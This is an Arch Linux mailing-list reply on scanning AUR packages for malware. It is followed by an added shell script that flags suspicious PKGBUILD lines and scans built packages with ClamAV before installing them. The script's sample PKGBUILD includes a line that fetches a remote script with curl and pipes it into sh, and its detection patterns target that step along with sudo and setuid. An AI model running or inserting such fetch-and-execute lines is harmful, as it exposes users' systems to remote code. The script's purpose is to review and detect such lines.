[arch-general] Integrating Virus Scanning for Packages Handled by Pacman

Daniel Micay danielmicay at gmail.com
Tue Apr 23 18:56:56 EDT 2013


On Tue, Apr 23, 2013 at 1:10 PM, Mark E. Lee <mark at markelee.com> wrote:
> While building packages on the AUR, I was wondering that except for
> manual user intervention (by reading the code), I didn't have any other
> methods of knowing if a package had malware or viruses. Hence, I was
> wondering if virus scanning via clamav should be called before pacman
> installs packages.
>
> --
> Mark E. Lee <mark at markelee.com>

The PKGBUILD itself is a bash script. If you're running them without
reading the code and checking that the sources are from an upstream
you trust, you're gonna have a bad time.

There are plenty of packages in the AUR that touch outside of $pkgdir
- but most seem to be beginner mistakes in good faith. ClamAV pretty
much just detects very common win32 viruses, because it's used on mail
servers to *reduce* the number of spread viruses.

If you really feel like scanning the package contents after you've
already trusted the PKGBUILD and build scripts, just don't use makepkg
-i.
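The workflow the reply points at (build with makepkg, look at what came out, only then hand it to pacman), written out as an added example that is not part of the thread or of any Arch tooling. `pkgbuild_flags` is an assumed grep-style heuristic of my own: it prints PKGBUILD lines that reach outside `$pkgdir`/`$srcdir`, call `sudo`, pipe a download into a shell, or set setuid bits, so a reviewer knows where to look first. It is a reading aid, not a security boundary, and it says nothing about the upstream sources themselves. `scan_then_install` is the build-scan-install sequence; it uses real `makepkg`, `bsdtar`, `clamscan` and `pacman` flags but refuses to run when any of those tools is missing. The sample PKGBUILD is constructed for the example and deliberately contains four lines the heuristic should catch.

```shell
#!/bin/sh
# Added example, not from the mailing-list thread. Helps review an AUR build
# before pacman ever sees it.

# Constructed sample PKGBUILD: two package() lines are fine (paths anchored at
# $pkgdir), four are the kind of thing a reviewer should notice.
sample_pkgbuild() {
    cat <<'EOF'
# Maintainer: Example <example@example.invalid>
pkgname=example-tool
pkgver=1.0
pkgrel=1
arch=('x86_64')
url="https://example.invalid/example-tool"
source=("https://example.invalid/example-tool-$pkgver.tar.gz")
sha256sums=('SKIP')

build() {
  cd "$srcdir/$pkgname-$pkgver"
  make
}

package() {
  cd "$srcdir/$pkgname-$pkgver"
  install -Dm755 example-tool "$pkgdir/usr/bin/example-tool"
  install -Dm644 example.conf "${pkgdir}/etc/example.conf"
  # The four lines below are what the heuristic is meant to flag:
  cp example.conf /etc/example.conf
  sudo systemctl enable example.service
  curl -s https://example.invalid/post-install.sh | sh
  chmod 4755 "$pkgdir/usr/bin/example-tool"
}
EOF
}

# Assumed heuristic (my own patterns, tune as needed). Reads a PKGBUILD on
# stdin and prints "line-number: line" for anything suspicious:
#   - absolute system paths not anchored at $pkgdir/$srcdir/$startdir
#   - sudo, curl/wget piped into a shell, setuid/setgid chmod
# Comment lines are skipped. One print per line even if several rules hit.
pkgbuild_flags() {
    awk '
        /^[[:space:]]*#/ { next }
        {
            t = $0
            gsub(/[{}]/, "", t)                                  # ${pkgdir} -> $pkgdir
            gsub(/\$(pkgdir|srcdir|startdir)"?\/[^[:space:]"]*/, "", t)  # drop anchored paths
            if (t ~ /(^|[^[:alnum:]_])\/(usr|etc|opt|var|root|home|boot)([^[:alnum:]_.-]|$)/ ||
                t ~ /(^|[[:space:]])sudo[[:space:]]/ ||
                t ~ /(curl|wget)[^|]*[|][[:space:]]*(ba)?sh/ ||
                t ~ /chmod[[:space:]]+[0-9]*[ug][+]s|chmod[[:space:]]+[2-7][0-7][0-7][0-7]/)
                print NR ": " $0
        }'
}

# Build without -i, extract the result, scan it, and install only on a clean
# scan. Run from the directory holding the PKGBUILD. Needs makepkg, bsdtar,
# clamscan and pacman; returns 2 if any is missing. clamscan exits 0 only when
# nothing matched (1 = match, 2 = error), so a scanner error also blocks install.
scan_then_install() {
    for tool in makepkg bsdtar clamscan pacman; do
        command -v "$tool" >/dev/null 2>&1 || { echo "missing: $tool" >&2; return 2; }
    done
    makepkg -sf || return 1                      # build only; nothing installed yet
    tmp=$(mktemp -d) || return 1
    for pkg in ./*.pkg.tar*; do
        bsdtar -xf "$pkg" -C "$tmp" || { rm -rf "$tmp"; return 1; }
    done
    if clamscan -r -i "$tmp"; then
        rm -rf "$tmp"
        sudo pacman -U ./*.pkg.tar*
    else
        echo "scan failed or found a match; package left uninstalled" >&2
        rm -rf "$tmp"
        return 1
    fi
}

# Review run: with the sample above this prints the four flagged lines.
sample_pkgbuild | pkgbuild_flags
```

Two caveats worth keeping in mind when using it: the reply's point about ClamAV stands, so a clean `clamscan` over a freshly built Linux package is weak evidence on its own; and the heuristic only looks at the PKGBUILD, while a package's `.install` script and the upstream sources it fetches deserve the same reading.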
